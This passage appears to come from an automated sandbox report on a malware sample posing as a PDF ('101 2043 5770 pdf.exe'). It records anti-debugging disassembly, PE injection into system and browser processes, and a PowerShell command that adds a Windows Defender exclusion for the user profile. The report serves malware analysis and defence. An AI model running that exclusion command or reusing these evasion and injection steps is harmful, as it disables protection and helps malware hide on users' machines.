Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A111A4 mov eax, dword ptr fs:[00000030h]	6_2_05A111A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059B7190 mov eax, dword ptr fs:[00000030h]	6_2_059B7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A0185 mov eax, dword ptr fs:[00000030h]	6_2_059A0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597B1B0 mov eax, dword ptr fs:[00000030h]	6_2_0597B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1C188 mov eax, dword ptr fs:[00000030h]	6_2_05A1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1C188 mov eax, dword ptr fs:[00000030h]	6_2_05A1C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A361E5 mov eax, dword ptr fs:[00000030h]	6_2_05A361E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D1D0 mov eax, dword ptr fs:[00000030h]	6_2_0599D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599D1D0 mov ecx, dword ptr fs:[00000030h]	6_2_0599D1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov ecx, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DE1D0 mov eax, dword ptr fs:[00000030h]	6_2_059DE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A071F9 mov esi, dword ptr fs:[00000030h]	6_2_05A071F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A261C3 mov eax, dword ptr fs:[00000030h]	6_2_05A261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A261C3 mov eax, dword ptr fs:[00000030h]	6_2_05A261C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059901F8 mov eax, dword ptr fs:[00000030h]	6_2_059901F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A351CB mov eax, dword ptr fs:[00000030h]	6_2_05A351CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059851EF mov eax, dword ptr fs:[00000030h]	6_2_059851EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059651ED mov eax, dword ptr fs:[00000030h]	6_2_059651ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595B136 mov eax, dword ptr fs:[00000030h]	6_2_0595B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961131 mov eax, dword ptr fs:[00000030h]	6_2_05961131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05961131 mov eax, dword ptr fs:[00000030h]	6_2_05961131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A20115 mov eax, dword ptr fs:[00000030h]	6_2_05A20115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov ecx, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A0A118 mov eax, dword ptr fs:[00000030h]	6_2_05A0A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05990124 mov eax, dword ptr fs:[00000030h]	6_2_05990124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05966154 mov eax, dword ptr fs:[00000030h]	6_2_05966154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05966154 mov eax, dword ptr fs:[00000030h]	6_2_05966154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C156 mov eax, dword ptr fs:[00000030h]	6_2_0595C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05967152 mov eax, dword ptr fs:[00000030h]	6_2_05967152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F8158 mov eax, dword ptr fs:[00000030h]	6_2_059F8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov ecx, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F4144 mov eax, dword ptr fs:[00000030h]	6_2_059F4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05959148 mov eax, dword ptr fs:[00000030h]	6_2_05959148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h]	6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h]	6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F3140 mov eax, dword ptr fs:[00000030h]	6_2_059F3140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F9179 mov eax, dword ptr fs:[00000030h]	6_2_059F9179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595F172 mov eax, dword ptr fs:[00000030h]	6_2_0595F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35152 mov eax, dword ptr fs:[00000030h]	6_2_05A35152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05965096 mov eax, dword ptr fs:[00000030h]	6_2_05965096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599909C mov eax, dword ptr fs:[00000030h]	6_2_0599909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D090 mov eax, dword ptr fs:[00000030h]	6_2_0598D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598D090 mov eax, dword ptr fs:[00000030h]	6_2_0598D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595D08D mov eax, dword ptr fs:[00000030h]	6_2_0595D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A260B8 mov eax, dword ptr fs:[00000030h]	6_2_05A260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A260B8 mov ecx, dword ptr fs:[00000030h]	6_2_05A260B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0596208A mov eax, dword ptr fs:[00000030h]	6_2_0596208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059ED080 mov eax, dword ptr fs:[00000030h]	6_2_059ED080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059ED080 mov eax, dword ptr fs:[00000030h]	6_2_059ED080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F80A8 mov eax, dword ptr fs:[00000030h]	6_2_059F80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E20DE mov eax, dword ptr fs:[00000030h]	6_2_059E20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059890DB mov eax, dword ptr fs:[00000030h]	6_2_059890DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov ecx, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059770C0 mov eax, dword ptr fs:[00000030h]	6_2_059770C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD0C0 mov eax, dword ptr fs:[00000030h]	6_2_059DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD0C0 mov eax, dword ptr fs:[00000030h]	6_2_059DD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C0F0 mov eax, dword ptr fs:[00000030h]	6_2_0595C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059A20F0 mov ecx, dword ptr fs:[00000030h]	6_2_059A20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A0E3 mov ecx, dword ptr fs:[00000030h]	6_2_0595A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A350D9 mov eax, dword ptr fs:[00000030h]	6_2_05A350D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059850E4 mov eax, dword ptr fs:[00000030h]	6_2_059850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059850E4 mov ecx, dword ptr fs:[00000030h]	6_2_059850E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E60E0 mov eax, dword ptr fs:[00000030h]	6_2_059E60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059680E9 mov eax, dword ptr fs:[00000030h]	6_2_059680E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0597E016 mov eax, dword ptr fs:[00000030h]	6_2_0597E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A2903E mov eax, dword ptr fs:[00000030h]	6_2_05A2903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E4000 mov ecx, dword ptr fs:[00000030h]	6_2_059E4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F6030 mov eax, dword ptr fs:[00000030h]	6_2_059F6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595A020 mov eax, dword ptr fs:[00000030h]	6_2_0595A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595C020 mov eax, dword ptr fs:[00000030h]	6_2_0595C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A35060 mov eax, dword ptr fs:[00000030h]	6_2_05A35060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962050 mov eax, dword ptr fs:[00000030h]	6_2_05962050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598B052 mov eax, dword ptr fs:[00000030h]	6_2_0598B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E6050 mov eax, dword ptr fs:[00000030h]	6_2_059E6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov ecx, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05971070 mov eax, dword ptr fs:[00000030h]	6_2_05971070

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 9_2_00DE39FE FormatMessageW,ConvertLengthToIpv4Mask,InetNtopW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,LocalFree,LocalAlloc,GetAdaptersAddresses,LocalFree,

9_2_00DE39FE

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D7854F20 RtlAddVectoredExceptionHandler,RaiseFailFastException,	0_2_00007FF7D7854F20
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Code function: 0_2_00007FF7D78BBE8C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7D78BBE8C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00DE53F0 SetUnhandledExceptionFilter,	9_2_00DE53F0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 9_2_00DE51A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00DE51A0

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\System32\calc.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF728280000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\calc.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\cmd.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Windows\System32\svchost.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
